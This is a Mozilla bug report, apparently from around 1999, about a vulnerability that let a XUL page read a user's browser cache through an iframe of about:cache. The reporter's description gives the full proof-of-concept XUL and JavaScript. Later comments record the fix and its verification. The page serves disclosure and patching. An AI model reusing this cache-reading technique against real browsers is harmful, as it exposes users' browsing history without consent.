Reading user's cache using XUL and iframe

VERIFIED FIXED in M11

Status

()

Core
Security
P3
normal
VERIFIED FIXED
19 years ago
18 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---
Dependency tree / graph

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

19 years ago
There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms),
which allows reading user's cache using XUL and iframe.
The code is:
----------------------------------cache2.xul--------------------------
<?xml version="1.0"?>
<!--
 <?xml-stylesheet href="xul.css" type="text/css"?>
-->
 <!DOCTYPE window>
 <xul:window
   xmlns:html="http://www.w3.org/TR/REC-html40"
   xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
   title = "Reading user's cache">
 <html:script>
   <![CDATA[
   function dumpCache() {
     dump("Here are some URLs from your cache:\n");
     for(i=0;i<10;i++)
       dump(window.frames[0].document.links[i].href+"\n");
   }
   ]]>
 </html:script>
 <xul:toolbox>
   <xul:toolbar>
     <xul:titledbutton
       value="Press me to dump cache"
       onclick="dumpCache()"
       style="background-color:rgb(192,192,192);"/>
   </xul:toolbar>
 </xul:toolbox>
<html:hr/>
<html:iframe type="content-primary" src="about:cache" />
<html:h3>
Press the button and look at the apprunner console to see some URLs in your cache.
</html:h3>
</xul:window>
----------------------------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
(Assignee)

Updated

19 years ago
Target Milestone: M11
(Assignee)

Updated

19 years ago
Blocks: 12633

Updated

19 years ago
Group: netscapeconfidential?
Component: Browser-General → Security
QA Contact: leger → dshea

Comment 1

19 years ago
Updating component
(Assignee)

Updated

19 years ago
Depends on: 11462
(Assignee)

Updated

19 years ago
Depends on: 7254
No longer depends on: 11462
(Assignee)

Comment 2

19 years ago
Fixed. Now we get an error from the URL checks:

->>>>>>>>>>>>>> Write Clipboard to memory
->>>>>>>>>>>>>> Read Clipboard from memory
Opening file signon.tbl failed
FindShortcut: in='http://prime/gunxul/cache1.xul '  out='null'
JavaScript Error: illegal URL method 'about:cache'
URL: http://prime/gunxul/cache1.xul
LineNo: 4

JavaScript Error: uncaught exception: [Exception... "Failure"  code: "-214746725
9" nsresult: "0x80004005 (NS_ERROR_FAILURE)"  location: "http://prime/gunxul/cac
he1.xul  Line: 4"]

Document http://prime/gunxul/cache1.xul  loaded successfully
Document: Done (0.657 secs)
(Assignee)

Updated

19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Updated

19 years ago
Status: RESOLVED → VERIFIED

Comment 3

19 years ago
Windows NT 1999120208 Comm
Verified

Comment 4

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.